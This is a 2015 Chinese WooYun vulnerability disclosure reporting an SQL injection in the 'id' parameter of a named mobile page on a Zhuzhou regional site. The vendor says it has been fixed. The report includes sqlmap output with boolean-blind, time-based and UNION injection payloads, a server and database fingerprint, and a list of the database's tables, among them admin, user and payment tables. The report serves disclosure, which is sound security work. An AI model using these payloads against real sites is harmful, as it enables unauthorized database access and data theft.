当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159239

漏洞标题:株洲在线某站存在SQL注入漏洞

相关厂商:zzz4.com

漏洞作者: 深度安全实验室

提交时间:2015-12-08 10:45

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

http://m.zzz4.com/pk/info.php?id=1

宽字节注入

3.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (2446=2446) THEN 1 ELSE 0x28 END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))njch)
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6e7450765967766c4b6f,0x716b707671),NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.14
back-end DBMS: MySQL 5.0.12
Database: zx_db
[100 tables]
+----------------------------+
| loupan_info |
| loupan_info_copy |
| zx_activity |
| zx_activity_cate_maps |
| zx_activity_cates |
| zx_activity_join |
| zx_ad_sign |
| zx_admin |
| zx_ads |
| zx_announcement |
| zx_appointment |
| zx_area |
| zx_ask |
| zx_ask_answer |
| zx_ask_cates |
| zx_ask_supply |
| zx_bbs |
| zx_bbs_cates |
| zx_bbs_reply |
| zx_building |
| zx_building_copy |
| zx_building_site |
| zx_case |
| zx_case_cate_maps |
| zx_case_cates |
| zx_case_love |
| zx_case_pics |
| zx_case_project |
| zx_case_project_cate_maps |
| zx_certificate |
| zx_city |
| zx_comments |
| zx_content |
| zx_content_cates |
| zx_content_project |
| zx_dec_com_cates |
| zx_dec_company |
| zx_dec_company_cate_maps |
| zx_dec_company_dianping |
| zx_dec_company_templates |
| zx_dec_team |
| zx_dec_team_cate_maps |
| zx_dec_team_cates |
| zx_designer |
| zx_designer_cate_maps |
| zx_designer_cates |
| zx_diary |
| zx_diary_cates |
| zx_domain |
| zx_files |
| zx_group |
| zx_group_map |
| zx_integral |
| zx_integral_exchange |
| zx_integral_shop |
| zx_integral_used |
| zx_knowledge |
| zx_knowledge_cates |
| zx_links |
| zx_lrzxrj |
| zx_lrzxrj_cate |
| zx_lrzxrj_pic |
| zx_mater_com_cates |
| zx_mater_company |
| zx_mater_company_cate_maps |
| zx_materials |
| zx_memo |
| zx_menu |
| zx_mobiles |
| zx_pay_logs |
| zx_payment |
| zx_preferential |
| zx_preferential_cate_maps |
| zx_preferential_cates |
| zx_privilege |
| zx_privilege_group |
| zx_product |
| zx_product_cates |
| zx_roomtypecalc |
| zx_sensitiveword |
| zx_setting |
| zx_system_content |
| zx_system_logs |
| zx_template_setting |
| zx_template_setting_copy |
| zx_templates |
| zx_tenders |
| zx_tenders_look |
| zx_tenders_look_detail |
| zx_tenders_maps |
| zx_tenders_setting |
| zx_tuan |
| zx_tuan_cates |
| zx_tuan_orders |
| zx_users |
| zx_users_bonus |
| zx_users_ex |
| zx_users_gold_pay_logs |
| zx_via |
| zx_zxrj |
+----------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-12-08 11:27

厂商回复:

漏洞已修复,谢谢检测

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-08 11:36 | 深度安全实验室 ( 核心白帽子 | Rank:2695 漏洞数:454 )

    这是换人了么?给分这么低